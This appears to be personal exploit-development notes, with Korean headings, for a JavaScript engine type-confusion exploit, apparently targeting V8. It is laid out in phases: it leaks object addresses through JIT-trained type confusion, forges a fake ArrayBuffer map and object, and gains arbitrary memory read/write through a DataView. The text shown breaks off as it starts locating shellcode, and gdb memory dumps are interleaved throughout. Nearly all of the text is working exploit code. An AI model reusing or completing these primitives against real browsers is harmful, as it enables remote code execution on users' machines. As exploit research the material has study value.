ab_map_obj 생성
phase 1 : set ab_map_obj[]
ap.proto를 구해서 ab_map_obj에 넣는다
//alert_log(addr);
var nop = 0xdaba0000;
var ab_map_obj = [
nop,nop,
0x1f000008,0x000900c0,0x082003ff,0x0,
nop,nop, // use ut32.prototype replace it
nop,nop,0x0,0x0
]
ab_proto_addr = read_obj_addr(ab.__proto__);
ab_constructor_addr = ab_proto_addr - 0x70;
alert_log("[.] 1.ab_prot_addr: 0x" + ab_proto_addr.toString(16));
//sleep(60*1000);
ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
0x26e976fd3f78: 0xdaba0000daba0000 0x000900c01f000008
0x26e976fd3f88: 0x00000000082003ff 0x000026e976f95889
0x26e976fd3f98: 0x000026e976f95819 0x0000000000000000
phase 2 : ab_map_obj 의 주소 찾기
gdb에서 0x000900c01f000008 값이 찾아져야 함
change_to_float(ab_map_obj,ab_map_obj_float);
ab_map_obj_addr = read_obj_addr2(ab_map_obj_float) + 0x40
gdb-peda$ find 0x000900c01f000008
Searching for '0x000900c01f000008' in: None ranges
Found 1 results, display max 1 items:
mapped : 0x26e976fd3f80 --> 0x900c01f000008
phase 3 : fake_ab 의 주소 찾기
change_to_float(fake_ab,fake_ab_float);
fake_ab_float_addr = read_obj_addr3(fake_ab_float) + 0x40;
var fake_ab = [
ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
0x0,0x4000, /* buffer length */
0x12345678,0x123,/* buffer address */
0x4,0x0
]
phase 4 : fake_arraybuffer 오프젝트 만들기
fake_arraybuffer = double_arr42[1];
fake_dv = new DataView(fake_arraybuffer,0,0x4000);
fake_ab_float_addr_f = d2u(fake_ab_float_addr / 0x100000000,fake_ab_float_addr & 0xffffffff).toString();
function carry_me_plz_fake(arr){
for(var i = 0;i < arr.length;i++){
var o = arr[i];
ttt = o[0];
}
}
eval('function sorry_fake(){1 + valueOf4;double_arr42[0] = 1.1;carry_me_plz_fake(array4);double_arr42[1] = '+fake_ab_float_addr_f+';}')
for(var i = 0;i < 0x1000;i++){
carry_me_plz_fake(array3);
}
for(var i = 0;i < 0x1000;i++){
sorry_fake();
}
flag = 1;
sorry_fake();
//sleep(60)
fake_arraybuffer = double_arr42[1];
phase 5 : shellcode 주소 찾기
function read_obj_addr5(object){
function carry_me_plz(arr,obj){
for(var i = 0;i < arr.length;i++){
var o = arr[i];
o[0] = obj;
}
}
function sorry(){
1 + valueOf5;
double_arr52[0] = 1.1;
carry_me_plz(array5,object);
return double_arr52[0];
}
for(var i = 0;i < 0x1000;i++){
carry_me_plz(array5,object);
}
for(var i = 0;i < 0x1000;i++){
sorry();
}
flag = 1;
re = u2d(sorry());
return re;
}